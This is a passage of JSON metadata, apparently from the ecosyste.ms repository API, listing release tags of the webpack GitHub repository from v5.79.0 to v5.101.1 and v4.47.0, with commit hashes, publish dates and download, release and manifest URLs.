cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/